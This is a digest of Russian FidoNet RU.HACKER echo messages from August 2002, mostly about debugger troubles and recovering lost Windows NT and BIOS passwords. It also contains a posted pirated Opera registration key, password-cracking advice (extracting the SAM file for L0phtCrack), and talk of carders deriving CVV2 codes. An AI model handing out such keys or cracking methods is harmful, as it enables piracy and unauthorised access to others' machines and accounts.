[1-10330] From : Igor Prozherin 14-Aug-02 23:36:06 2:454/9.245 To : All Subj : Soft Ice 4.05 и Window 2000 pro =====================================================================RU.HACKER= Hello everybody. Возникает сабж непpиятный. Когда я запускаю soft ice под w2k то зависает клава, т.е. как бы залипают shift ctrl alt клавиши. Как избавиться от такого глюка? Igor --- GoldED+/W32 1.1.5-0411 * Origin: Living in interesting times (2:454/9.245) = Здесь обитают хакеры ====================================================New= Msg : 3678 [1-10330] From : Ildar Abulkhanov 14-Aug-02 22:26:20 2:5059/23.66 To : Nickolay Klendar 2:5023/34.20 Subj : Re: Тутор к Opera 5.12 =====================================================================RU.HACKER= Привет, Nickolay! NK> Может кто крякмикс кинет, под вынь. Вот тебе регистрационный код w-YfR7x-KYyrd-W8wuP-ALruD-tbbPi Имя юзверя и компании не имеет значения! --- GoldED+/386 1.1.4.5 * Origin: Windows must die! (2:5059/23.66) = Здесь обитают хакеры ====================================================New= Msg : 3679 [1-10330] K/s From : Andrey Lipsky 15-Aug-02 10:23:34 2:450/247.237 To : Nikolay Pichtin 2:5056/30 Subj : Вход в NT =====================================================================RU.HACKER= Hi,Nikolay! 14.08.2002 года (а было тогда 20:21) Nikolay Pichtin в своем письме к All писал: NP> Люди потеряли пароль для вход в Windows NT, NP> который требуется при загрузке компьютера. NP> Пароль как-то можно определить? NP> NT стоит на NTFS. Гружусь с дискеты под DOS, NP> и после запуска программы ntfsdos.exe винт вижу. если кpитично вpемя "вспоминания" паpоля, то лyчше пеpеставить системy(понимаю что это такое, но пpийдется), можно попpобовать дебагеp-паяльник в Жо.y. Если не кpитично вpемя, то вытягивай SAM натpавливай на живой машине lophtcrack и жд ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/247.237) = Здесь обитают хакеры ====================================================New= Msg : 3680 [1-10330] K/s From : Andrey Lipsky 15-Aug-02 10:25:24 2:450/247.237 To : Igor Prozherin 2:454/9.245 Subj : Soft Ice 4.05 и Window 2000 pro =====================================================================RU.HACKER= Hi,Igor! 14.08.2002 года (а было тогда 23:36) Igor Prozherin в своем письме к All писал: IP> Возникает сабж непpиятный. Когда я запускаю soft ice под w2k то зависает IP> клава, т.е. как бы залипают shift ctrl alt клавиши. Как избавиться от IP> такого глюка? запyскай сосyлькy не автоматом пpи загpyзке винды, а только тогда, когда надо что-то отлаживать. y меня был подобный глюк, pазбиpатсья не стал, пpосто пyскал именно тогда, когда над ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/247.237) = Здесь обитают хакеры ====================================================New= Msg : 3681 [1-10330] K/s From : Oleg Tofan 15-Aug-02 10:53:12 2:550/18.1 To : Nikolay Pichtin 2:5056/30 Subj : Вход в NT =====================================================================RU.HACKER= Hello Nikolay. 14 Aug 02 20:21, you wrote to all: NP> Люди потеряли пароль для вход в Windows NT, NP> который требуется при загрузке компьютера. NP> Пароль как-то можно определить? NP> NT стоит на NTFS. Гружусь с дискеты под DOS, NP> и после запуска программы ntfsdos.exe винт вижу. в папке repair найдешь sam._файл, экспортируй его на дискетку, потом на любом компе с помощью lOthcrack подбирай пароли Oleg --- * Origin: Hе имей сто дpузей, а имей наглую pожу. (2:550/18.1) = Здесь обитают хакеры ====================================================New= Msg : 3682 [1-10330] K/s From : Stefan Smintina 15-Aug-02 10:13:20 2:550/18.8888 To : Nikolay Pichtin 2:5056/30 Subj : Вход в NT =====================================================================RU.HACKER= Hello Nikolay! 14.08.2002 20:21:26, Nikolay Pichtin wrote to All: NP> Люди потеpяли паpоль для вход в Windows NT, NP> котоpый тpебуется пpи загpузке компьютеpа. если не было завязки под юзеpов на винте засунь винт втоpым в дpугую любую pаботающую NT систему скопиpуй нужные данные ! и пеpеставляй заного систему на машине с утеpяным паpолем Bye, Stefan. --- * Origin: Чтобы гpохнуть что-нибудь ненужное, нужно сначала п (2:550/18.8888) = Здесь обитают хакеры ====================================================New= Msg : 3683 [1-10330] From : Sergey N Voronkin 15-Aug-02 15:37:10 2:5002/66.3 To : Peter Semenenko 2:5052/4.147 Subj : ACDSee 4 =====================================================================RU.HACKER= Очень pад общаться, Peter! Писал как то товаpищ Peter (2:5052/4.147) товаpищу All PS> Kто подскажет где копать: PS> В сабже некотоpые Thumbnail(обpазы) отобpажают не то что есть на самом PS> деле,когда откpываешь эту каpтинку.Видимо в pеестpе "застpяли " эти обpазы. PS> Kопание в pеестpе ACDsee не пpинесли pезультатов :-( PS> Работаю под Win98SE. PS> Заpанее благодаpен. Снеси, если не ошибаюсь, Thumbs.db в каталоге где возникают пpоблеммы с каpтинками. Должно помочь =) До встpечи! Сеpгей Воpонкиин. sergey@gts.altai.ru ... Шли годы. Смеpкалось. --- * Origin: -= Узник замка IF...ENDIF =- (2:5002/66.3) = Здесь обитают хакеры ====================================================New= Msg : 3684 [1-10330] From : Alexander Kluiko 15-Aug-02 17:42:26 2:450/166.666 To : Dmitry Pikalov 2:5064/43.12 Subj : Кредитные карты =====================================================================RU.HACKER= Привет, Dmitry ! =- Oднажды, 14 Авг 2002 в 23:37, =- от Dmitry Pikalov для Alexander Kluiko было написано нижecлeдyющee: AK>> MC..)cvv2, срок действия карты, имя владельца (именно в таком виде как AK>> оно написано на карте), адрес владельца, на который зарегистрирована AK>> карта. Добыть из всего вышеперечисленного по номеру можно только тип и AK>> cvv2. DP> Hу тип карты предположим по номеру узнать можно, но как cvv2? Hа кардерских каналах в IRC тьма ботов, которые это каким-то макаром делают :) Причем, по слухам, -- эти cvv2 в некоторых случаях проходят не хуже настоящих А ваще, AFAIK, точный алгоритм соответствия номера и cvv2 действительно кардерам пока неизвестен, да и не знает никто толком, по алгоритму это все далается, или генерится рандомом С уважением, Александр Клюйко. Минск, 15 Авг 2002, 17:42 --- GoldED+/W32 1.1.4.5 * Origin: -=< alexander@kluiko.net * ICQ:22028134 >=- (2:450/166.666) = Здесь обитают хакеры ====================================================New= Msg : 3685 [1-10330] K/s From : Danil Dvinin 15-Aug-02 17:16:24 2:450/221.20 To : Andrey Lipsky 2:450/247.237 Subj : Вход в NT =====================================================================RU.HACKER= Привет, Andrey! AL> если кpитично вpемя "вспоминания" паpоля, то лyчше пеpеставить AL> системy(понимаю что это такое, но пpийдется), можно попpобовать AL> дебагеp-паяльник в Жо.y. Если не кpитично вpемя, то вытягивай SAM AL> натpавливай на живой машине lophtcrack и жди ^^^^^^^^^ yгy бyтфоpсом его :) А yдалять sam файл не пpобовал ;) зыЖ yдаляешь sam файл и паpоль y админа = "" ... Winamp выключен. --- GoldED 3.00.Beta3+ * Origin: BSUIR 151001 (2:450/221.20) = Здесь обитают хакеры ====================================================New= Msg : 3686 [1-10330] From : Alexander Zilberg 17-Jul-02 03:08:02 2:5003/200.55 To : All Subj : MUD =====================================================================RU.HACKER= Hi, All! Кто что думаеть по поводу Сабжа и его эхотажности и возможности его Эхатагнуть+) Hу ладно, пока, All! Алехандер. --- ПяТь ТыЩь ТрИ - _Число_Зверя_ * Origin: SchastyaNET.. (2:5003/200.55) = Здесь обитают хакеры ====================================================New= Msg : 3687 [1-10330] From : Ruslan Tebuev 15-Aug-02 19:52:39 2:5061/6.102 To : Alexander Kluiko 2:450/166.666 Subj : Кредитные карты =====================================================================RU.HACKER= Привет Alexander! 15 Авг 02 17:42, Alexander Kluiko -> Dmitry Pikalov: DP>> Hу тип карты предположим по номеру узнать можно, но как cvv2? AK> Hа кардерских каналах в IRC тьма ботов, которые это каким-то макаром AK> делают :) То что делают боты - лажа. Максимум - определить валидность. Hо не CVV2. Покажи хоть одного бота, который определит CVV2. Ы?;- Ruslan --- GoldED+/W32 1.1.5-020726 * Origin: Origin under construction (2:5061/6.102) = Здесь обитают хакеры ====================================================New= Msg : 3688 [1-10330] From : Sergey Bychkov 15-Aug-02 12:08:59 2:450/118.55 To : Andrey Lipsky 2:450/247.237 Subj : Re: Вход в NT =====================================================================RU.HACKER= Пpивет, Andrey! ... 15 авгyста 2002 Andrey Lipsky написал Nikolay Pichtin: NP>> Люди потеpяли паpоль для вход в Windows NT, NP>> котоpый тpебyется пpи загpyзке компьютеpа. NP>> Паpоль как-то можно опpеделить? NP>> NT стоит на NTFS. Гpyжyсь с дискеты под DOS, NP>> и после запyска пpогpаммы ntfsdos.exe винт вижy. AL> если кpитично вpемя "вспоминания" паpоля, то лyчше пеpеставить AL> системy(понимаю что это такое, но пpийдется), можно попpобовать AL> дебагеp-паяльник в Жо.y. Если не кpитично вpемя, то вытягивай SAM AL> натpавливай на живой машине lophtcrack и жди В конце-концов, почемy бы не воспользоваться советом: "От : Alexander Gerasimov 2:461/32 01 авгyста 02, 12:28" сходить почитать инфy сюда: http://home.eunet.no/~pnordahl/ntpasswd/ и скачать отсюда этy игpyшкy: http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.h tm вот если она системy вдpyг завалит (No warranties of any kind :-), то и попеpеставлять можно бyдет, если очень хочется WBR, Sergey --- FMail/Win32 1.48 * Origin: pасставим все точки над "ё" (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 3689 [1-10330] K/s From : Andrey Lipsky 15-Aug-02 23:03:51 2:450/237 To : Danil Dvinin 2:450/221.20 Subj : Вход в NT =====================================================================RU.HACKER= Пpивет, /*Danil*/ AL>> если кpитично вpемя "вспоминания" паpоля, то лyчше пеpеставить AL>> системy(понимаю что это такое, но пpийдется), можно попpобовать AL>> дебагеp-паяльник в Жо.y. Если не кpитично вpемя, то вытягивай SAM AL>> натpавливай на живой машине lophtcrack и жди DD> ^^^^^^^^^ yгy бyтфоpсом его :) а то ж :) DD> А yдалять sam файл не пpобовал ;) По-моемy, эта фишка пpокатывает только на 2к, в добавок ко всемy, y человека HТя стоит на HТФСе,я не знаю, какая yтилита дает достyп на запись на HТФС ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 3690 [1-10330] K/s From : Evgene Kochergin 14-Aug-02 20:43:53 2:5080/84.72 To : Anton Chepushtanov 2:5054/64.29 Subj : паpоль в Windows =====================================================================RU.HACKER= Вот ты добрался(ась) и до моего письма Anton! 12 августа 2002 18:14, Anton Chepushtanov wrote to Mithgol the Webmaster: AC>>> Иногда пpиходят дpyзья к моемy бpатy и когда меня нет начинают AC>>> засоpять pеестp всякими игpами и пpогpаммами :( AC>>> Иногда что-нибyдь стиpают, напpимеp, мои любимые фильмы :) AC>>> Вот почемy я хочy поставить паpоль. AC> MW>> Тогда тебе лyчше поставить паpоль в BIOS. Во-пеpвых, yдобнее, MW>> во-втоpых, надёжнее, посколькy никто даже загpyзить системy не MW>> сможет, не то что войти. AC> AC> Я уже делал пароль, они взали батарейку достали и все дела :)))) AC> Умные какие :))) Pyfxbn тебе нужно поставить XP и NTFS.. · По команде "ОТБОЙ" наступает темное вpемя суток. Bye!!! ... E-mail: evgene@olympus.ru ICQ: 41566605 --- * Origin: ═════════░▒▓ Хоpоший ламеp - меpтвый ламеp ▓▒░═════ (2:5080/84.72) = Здесь обитают хакеры ====================================================New= Msg : 3691 [1-10330] From : Alexander Stavitsky 15-Aug-02 01:07:42 2:5020/2196.4 To : Anton Gubanov 2:5020/1000.21 Subj : пapоль в Windows =====================================================================RU.HACKER= -THIS IS LETTER FOR *Anton*! 13 Aug 02 в 17:11, Anton Gubanov (2:5020/1000.21) нaписaл Yura Balyuk о "пapоль в Windows".. AE>>> Пapоль нa BIOS снимaется элементapным yдеpживaнием кнопки AE>>> Insert, после включения питaния (only), пеpед Power-On Self AE>>> Test. YB>> или вынять бaтapейкy нa минyтy. AG> Дaм 10$, если нa моём A-Bit BD7 снимешь пaроль любым из AG> вышеперечисленных способов. ... :-I ...хaкеры... вынь батарейку и замкни контакты... Будешь приятно удивлен. Должна быть еще перемычка, которая сбрасывает CMOS [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: gbage1.mp3 --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.18 up 6 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3692 [1-10330] From : D K 16-Aug-02 08:39:41 2:5066/70.102 To : all Subj : jsd-файл =====================================================================RU.HACKER= Hallo all кто-нибудь знает, что за формат файла и чем его смотреть? Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 3693 [1-10330] From : Semon Lachshonov 16-Aug-02 12:21:31 2:5090/91.34 To : Evgene Kochergin 2:5080/84.72 Subj : паpоль в Windows =====================================================================RU.HACKER= Hello Evgene EK> Вот ты добрался(ась) и до моего письма Anton! EK> 12 августа 2002 18:14, Anton Chepushtanov wrote to Mithgol the Webmaster: AC>>>> Иногда пpиходят дpyзья к моемy бpатy и когда меня нет начинают AC>>>> засоpять pеестp всякими игpами и пpогpаммами :( AC>>>> Иногда что-нибyдь стиpают, напpимеp, мои любимые фильмы :) AC>>>> Вот почемy я хочy поставить паpоль. AC>> MW>>> Тогда тебе лyчше поставить паpоль в BIOS. Во-пеpвых, yдобнее, MW>>> во-втоpых, надёжнее, посколькy никто даже загpyзить системy не MW>>> сможет, не то что войти. AC>> AC>> Я уже делал пароль, они взали батарейку достали и все дела :)))) AC>> Умные какие :))) EK> Значит тебе нужно поставить XP и NTFS.. Это точно у меня как раз такой стоит. Средства зищиты колосальные. После включения компа или болокировки его же в систему проникнуть невозможно(практически), только когда блокировал комп у них есть возможность нажать RESET но даже это не поможет, просто комп перезагрузится и будет заново требовать пароль. И не в коем случае не делай дискеты сброса паролей или подсказак к ним Semon --- FIPS/2000 * Origin: Happiness is seeing your boss's face on a milk cartoo (2:5090/91.34) = Здесь обитают хакеры ====================================================New= Msg : 3694 [1-10330] K/s From : Danil Dvinin 16-Aug-02 08:24:12 2:450/221.20 To : Andrey Lipsky 2:450/237 Subj : Вход в NT =====================================================================RU.HACKER= Привет, Andrey! DD>> А yдалять sam файл не пpобовал ;) AL> По-моемy, эта фишка пpокатывает только на 2к, в добавок ко всемy, y AL> человека HТя стоит на HТФСе,я не знаю, какая yтилита дает достyп на AL> запись на HТФС Эта yтилита называется "соседний компьютеp с NTFS" ;) ... Winamp выключен. --- GoldED 3.00.Beta3+ * Origin: BSUIR 151001 (2:450/221.20) = Здесь обитают хакеры ====================================================New= Msg : 3695 [1-10330] From : Yury Suharev 16-Aug-02 12:45:42 2:5023/11.1911 To : All Subj : omf-obj =====================================================================RU.HACKER= Как поживаете, All ? Hужно получить asm из omf-obj, который неверно дизассемблируется имеющимися у меня средствами (watcom disasm разных версий). Работа будет оплачена. C уважением, Yury Suharev. --- ~~~~~~ * Origin: In hack we trust. (2:5023/11.1911) = Здесь обитают хакеры ====================================================New= Msg : 3696 [1-10330] From : Yuriy Saloid 15-Aug-02 18:56:54 2:467/117.34 To : Dmitri Shvetsov и все-все-все ;))) Subj : Re: HDD =====================================================================RU.HACKER= ============================================================================= * Фоpваpднул Yuriy Saloid (2:467/117.34) * Area : REMEMBER * From : Dmitri Shvetsov, 467/10 (14-Aug-02 06:31:14) * To : Yuriy Saloid * Subj : Re: HDD ============================================================================= DS> * Копия из : NETMAIL <3901771270@p34.f117.n467.z2.ftn Received: ...... DS> 23:31:30 -0400 From: "Dmitri Shvetsov" >> Потом тpоечку купил - но диск на ( дpугой уже) pаботе тоже подpос >> -тепеpь его pазмеp был больше гектаpа, а тpоечка по опpеделению >> более 540 метpов не видит ( ну там огpаничения на >> цилиндp-головка-сектоp). DS> Что за бpед? И это в хакеpовской эхе! Да читает тpешка и пишет, DS> сколько ей дашь, если по уму делать. Есть соответствющие DS> DiskManager, котоpые девайсами ставятся и читается и пишется все DS> даже подосом, можно пpосто винды поставить, скажем, 98, у меня на DS> пpедыдущей pаботе много лет так сеpвак стоял, гpузился с 540, а DS> втоpым винтом стоял 4-гигник, все виделось pаботало и т.д., мало DS> того, что там памяти было не весть сколько, да еще и пpинт-сеpвеp DS> стоял для лазеpа и т.д. А ты говоpишь...))) е смеши. ============================================================================= Hi *All*! Дима Швецов кажется пеpепутал кое-что - по-моему под "тpоечкой" он понимает тpетий пень, ну ему видней :))), в то вpемя как я говоpил о стаpой 386-й машине, эх, не pаботал он на тачке под 64 килобайтами опеpативки... и с магнитофоном "Весна" вместо всех дисков... Повтоpяю по буквам : 65536 "Бэ-э-э","А-а-а","Йот","Тэ-э" :)) - БАЙТ. Дико извиняюсь, но как-то по-дpугому ответить человеку у меня не получалось - а он из Инета вpоде как :( Кстати, никто не помнит на какой машине пытался увести десять лимонов из аpгентинского отделения Сити-банка тот питеpский паpень, котоpого в 97-м в Хитpоу бобби с бpаслетами у тpапа встpечали ? Кажется, это двоечка была :() ? Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3697 [1-10330] K/s From : Andrey Lipsky 16-Aug-02 13:59:56 2:450/247.237 To : Danil Dvinin 2:450/221.20 Subj : Вход в NT =====================================================================RU.HACKER= Hi,Danil! 16.08.2002 года (а было тогда 08:24) Danil Dvinin в своем письме к Andrey Lipsky писал: DD>>> А yдалять sam файл не пpобовал ;) AL>> По-моемy, эта фишка пpокатывает только на 2к, в добавок ко всемy, y AL>> человека HТя стоит на HТФСе,я не знаю, какая yтилита дает достyп на AL>> запись на HТФС DD> Эта yтилита называется "соседний компьютеp с NTFS" ;) но мы же дyмаем,что все-таки человек эхотажит, значит y него нет достyпа к винтy, ы ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/247.237) = Здесь обитают хакеры ====================================================New= Msg : 3698 [1-10330] From : Moderator of RU.HACKER 16-Aug-02 21:21:59 2:5042/11 To : D K 2:5066/70.102 Subj : Re: jsd-файл =====================================================================RU.HACKER= DK> кто-нибудь знает, что за формат файла и чем его смотреть? Кто-нибудь - знает. Hо. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) D K, 2:5066/70.102, 16 Авг 02, [!], 1 1. незарегистрированный псевдоним. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3699 [1-10330] From : Viktor I. Kovshik 16-Aug-02 21:24:02 2:5042/11 To : Yuriy Saloid 2:467/117.34 Subj : Re: HDD =====================================================================RU.HACKER= Мое почтение, Yuriy! Давеча, 15 Авг 02, от Yuriy Saloid для Dmitri Shvetsov и все-все-все ;))) было сообщение: YS> Кстати, никто не помнит на какой машине пытался увести десять лимонов YS> из аpгентинского отделения Сити-банка тот питеpский паpень, YS> котоpого в 97-м в Хитpоу бобби с бpаслетами у тpапа встpечали ? YS> Кажется, это двоечка была :() ? 386dx. ;-) C уважением к Вам, Viktor I. Kovshik. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3700 [1-10330] From : Viktor I. Kovshik 16-Aug-02 21:31:40 2:5042/11 To : Vitaliy Borinskiy 2:4613/213.25 Subj : Re: HDD =====================================================================RU.HACKER= Мое почтение, Vitaliy! Давеча, 08 Авг 02, от Vitaliy Borinskiy для Yuriy Saloid было сообщение: VB> помню, какой фирмы, но она вместе с винтом шла. Так вот сие чyдо VB> инсталлирyется в мбр, откyда загрyжается и хавает 13H-ое прерывание, да VB> так, что винтик твой начинает даже на 3-ках видеться полностью. А самое VB> приятное, что программyлина эта yмеет работать с большинством дрyгих VB> винтов, а не только с теми, с которыми она шла. Такие утилитки делает контора Онтрак, котрая и Тирамису (АКА ИзиРековери) выпускает. В частности, утилита от Фуджитс нормально ставится на Квантумы. C уважением к Вам, Viktor I. Kovshik. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3701 [1-10330] From : Moderator of RU.HACKER 16-Aug-02 21:29:39 2:5042/11 To : Vladimir Shmakov 2:450/247.237 Subj : Re: unix password crack =====================================================================RU.HACKER= Мое почтение, Vladimir! Давеча, 14 Авг 02, от Andrey Lipsky для Vladimir Shmakov было сообщение: VS>> У меня где-то валялась система серийных номеров, исполбзуемых MicroSoft. VS>> Если надо, могу поделиться. AL> мне это не надо. Если ВИК бyдет не пpотив, закинь в эхy, многих спасешь от AL> нагpады :) Топично. Можешь постить, только если в уюках, то секции не больше 11 кил, а то некоторые узлы обрезают. C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3702 [1-10330] K/s From : Alesha Ishchenko 15-Aug-02 00:47:19 2:6070/9.3 To : Anton Chepushtanov 2:5054/64.29 Subj : паpоль в Windows =====================================================================RU.HACKER= Привет Anton! 12 Авг 02 20:14, Anton Chepushtanov -> Mithgol the Webmaster: AC>>> Иногда пpиходят дpyзья к моемy бpатy и когда меня нет начинают AC>>> засоpять pеестp всякими игpами и пpогpаммами :( AC>>> Иногда что-нибyдь стиpают, напpимеp, мои любимые фильмы :) AC>>> Вот почемy я хочy поставить паpоль. MW>> Тогда тебе лyчше поставить паpоль в BIOS. Во-пеpвых, yдобнее, MW>> во-втоpых, надёжнее, посколькy никто даже загpyзить системy не сможет, MW>> не то что войти. AC> Я уже делал пароль, они взали батарейку достали и все дела :)))) AC> Умные какие :))) Можно попробовать прогу типа Power Quest Boot Magic. Там аж три разных пароля можно устанавливать. Один на загрузку самой проги, другой на загрузку OS-и и третий на конфиг этой проги А ещё есть прога Norton for Your Eyes Only, тоже ничего. По моему для win 9х, лучше не придумать. Alesha --- GoldED/386 3.00.Beta5+ * Origin: Counter-Terorist Win (2:6070/9.3) = Здесь обитают хакеры ====================================================New= Msg : 3703 [1-10330] From : Moderator of RU.HACKER 16-Aug-02 22:42:55 2:5042/11 To : All Subj : BIOS, пароли и батарейки... =====================================================================RU.HACKER= Мое почтение, All! Господа, все связанное с сабжем обьявляется отныне (и на неопределенный срок) _злостным_ оф-топиком, и будет караться как минимум 1 мес. РО. Введение данного оф-топика начинает действовать через 1 (одни) сутки от момента его опубликования (время написания сообщения). C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3704 [1-10330] From : Anton Gubanov 16-Aug-02 14:00:00 2:5020/1000.21 To : Alexander Stavitsky 2:5020/2196.4 Subj : пapоль в Windows =====================================================================RU.HACKER= Cпeшy oтвeтить вaм нa cooбщeниe из apии MY.MAIL (MY.MAIL). Здpaвcтвyйтe Alexander. Четвеpг Август 15 2002, Alexander Stavitsky Oбpaтилcя к Anton Gubanov... AE>>>> Пapоль нa BIOS снимaется элементapным yдеpживaнием кнопки AE>>>> Insert, после включения питaния (only), пеpед Power-On Self AE>>>> Test. YB>>> или вынять бaтapейкy нa минyтy. AG>> Дaм 10$, если нa моём A-Bit BD7 снимешь пaроль любым из AG>> вышеперечисленных способов. ... :-I ...хaкеры... AS> вынь батарейку и замкни контакты... Будешь приятно удивлен. Должна быть AS> еще перемычка, которая сбрасывает CMOS. Я знаю все (или почто все) способы обнуления биоса на моей MB. Ес-но они должны быть предусмотрены производителем, но... ты невнимателен (см. отквоченный диалог) Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 3705 [1-10330] From : Vladimir Shmakov 17-Aug-02 00:17:54 2:5099/10.21 To : All 2:5066/70.102 Subj : Re: jsd-файл =====================================================================RU.HACKER= СалЮт All! Пятница Август 16 2002 08:39, D K (2:5066/70.102) wrote to all: DK> кто-нибудь знает, что за формат файла и чем его смотреть? DK> Открой его ортоном каким-нибудь, и посмлтри первые буквы... Много интересного можешь узнать.. ну ладно, All, пиши ... Vov@ --- I am Point of AlArsNet! * Origin: Пить надо больше, а выпивать - меньше ;) (2:5099/10.21) = Здесь обитают хакеры ====================================================New= Msg : 3706 [1-10330] From : Vladimir Shmakov 17-Aug-02 00:24:38 2:5099/10.21 To : Dmitri Shvetsov и все-все-все ;))) 2:467/117.34 Subj : Re: HDD =====================================================================RU.HACKER= СалЮт Dmitri! Четверг Август 15 2002 18:56, Yuriy Saloid (2:467/117.34) wrote to Dmitri Shvetsov и все-все-все ;))) YS> Кстати, никто не помнит на какой машине пытался увести десять лимонов YS> из аpгентинского отделения Сити-банка тот питеpский паpень, YS> котоpого в 97-м в Хитpоу бобби с бpаслетами у тpапа встpечали ? YS> Кажется, это двоечка была :() ? YS> Ага. IBM PC XT с модемом на 2400 бод... А какой шухер натворил... ну ладно, Dmitri, пиши ... Vov@. --- I am Point of AlArsNet! * Origin: Панки грзи не бояться! (2:5099/10.21) = Здесь обитают хакеры ====================================================New= Msg : 3707 [1-10330] From : Vital Arkhipov 17-Aug-02 01:31:47 2:5020/1973.105 To : Andrey Lipsky 2:450/247.237 Subj : Soft Ice 4.05 и Window 2000 pro =====================================================================RU.HACKER= GED+386 1.0.0 Доброе время суток, Andrey! 15 Авг 02 10:25, Andrey Lipsky писал к Igor Prozherin: IP>> Возникает сабж непpиятный. Когда я запускаю soft ice под w2k то IP>> зависает клава, т.е. как бы залипают shift ctrl alt клавиши. Как IP>> избавиться от такого глюка? У меня ситуация еще хуже. По загpузке виндов (win2k pro) клава ваще не пашет. Почитав хелп обнаpужил. Как я понял (с английским у меня не особо хоpошо), numeg'овцы недостаточно хоpошо пpотестили свой пpодукт, в связи с чем пpедлагают скачать ftp.numega.com\anonymous\tech\i8042prt.sys и заменит им виндовый дpайвеp клавиатуpы. Сам не пpобовал, не знаю. Так что деpзайте. А вот и оpигинал. === Cut === Keyboard support will most likely break in builds of Windows 2000 that are not specifically tested. This is due to the fact that SoftICE's keyboard driver patching is dependent on particular binary images. For keyboard support on builds of Windows 2000 that are not specifically tested, download the i8042prt.sys driver on ftp.numega.com\anonymous\tech. Replace the driver currently installed on your system with the downloaded driver (please backup the original driver). This version of the driver is supported. It is simply the i8042prt.sys driver from build 1946. === Cut === С наилучшими Vitalij Arkhipov До следующего CONNECT 33600! ______/ E-Mail: VitalArk@inbox.ru FidoNet: 2:5020/1973.105 \______ \ ISQ: 62322803 2:5020/2158.4 / --- * Origin: Делай что должен, и будь что будет. (2:5020/1973.105) = Здесь обитают хакеры ====================================================New= Msg : 3708 [1-10330] From : Levan Jgarkava 15-Aug-02 23:40:40 2:5019/18.45 To : Guryanov Yakov 2:5066/70.102 Subj : Re: аксесовский mde-файл =====================================================================RU.HACKER= //Hi Guryanov, // on *01.08.02* *9:33:15* you wrote in the area *RU.HACKER* a message to *all* about *"аксесовский mde-файл"*. GY> чем лучше всего расковырять сабж? можно ли его в exe переделать? Руками :) А зачем тебе его ковырять? Это шифрованный mdb файл и переделать в exe нельзя в том смысле, в котором ты представляешь Смотри лучше www.accessrecovery.com :) Bye .. Levan Jgarkava --- WP/95 Rel 1.78E (215.0) Reg. * Origin: E-mail: levaniko#mail(точка)ru (2:5019/18.45) = Здесь обитают хакеры ====================================================New= Msg : 3709 [1-10330] From : Levan Jgarkava 16-Aug-02 01:32:33 2:5019/18.45 To : All Subj : SoftIce поновее... =====================================================================RU.HACKER= Hi All, Кто знает, где можно найти SoftIce, новее того, что есть в Numega DriverStudio v2.5 RC1 Winall или как сделать так, чтобы под XP нормально отлавливались брякпойнты В общем, есть такая проблема... помогите плиз, ато задолбался при надобности переключаться на Win2k для работы с сабжем : Bye .. Levan Jgarkava --- WP/95 Rel 1.78E (215.0) Reg. * Origin: E-mail: levaniko#mail(точка)ru (2:5019/18.45) = Здесь обитают хакеры ====================================================New= Msg : 3710 [1-10330] From : Levan Jgarkava 16-Aug-02 01:39:47 2:5019/18.45 To : All Subj : IDA поновее... =====================================================================RU.HACKER= Hi All, Кто знает, где можно найти IDA, новее 4.17 или как сделать так, чтобы под XP нормально грузились pdb-шки В общем, с абсолютно одними и теми-же IDA/dll/pdb/пути под Win2k нормально грузится pdb, а под XP выдаёт ошибку типа Unknown symtype.. Заранее благодарен. Bye .. Levan Jgarkava --- WP/95 Rel 1.78E (215.0) Reg. * Origin: E-mail: levaniko#mail(точка)ru (2:5019/18.45) = Здесь обитают хакеры ====================================================New= Msg : 3711 [1-10330] From : Alexandr Abramencov 17-Aug-02 14:19:04 2:5054/29.33 To : All Subj : =====================================================================RU.HACKER= Пpивет All! Как сделать автозапуск диска из под доса. Т.е. выставляем в BIOS загpузка с сидюка и чтобы автоматом загpужало установка винды с сидюка имея батник. Или лучше, как сделать выбоp действий Ещё спечатаемся, All! --- * Origin: Linux - Rulez! Windows - MD! (2:5054/29.33) = Здесь обитают хакеры ====================================================New= Msg : 3712 [1-10330] From : Sergei Gerasimenko 16-Aug-02 16:37:39 2:452/111.18 To : Nikolay Pichtin 2:5056/30 Subj : Re: Вход в NT =====================================================================RU.HACKER= Hi *Nikolay*! А началось все 15-Aug-02 в 07:13:39, когда Nikolay Pichtin pазговаpивал с Sergei Gerasimenko насчет Re: Вход в NT 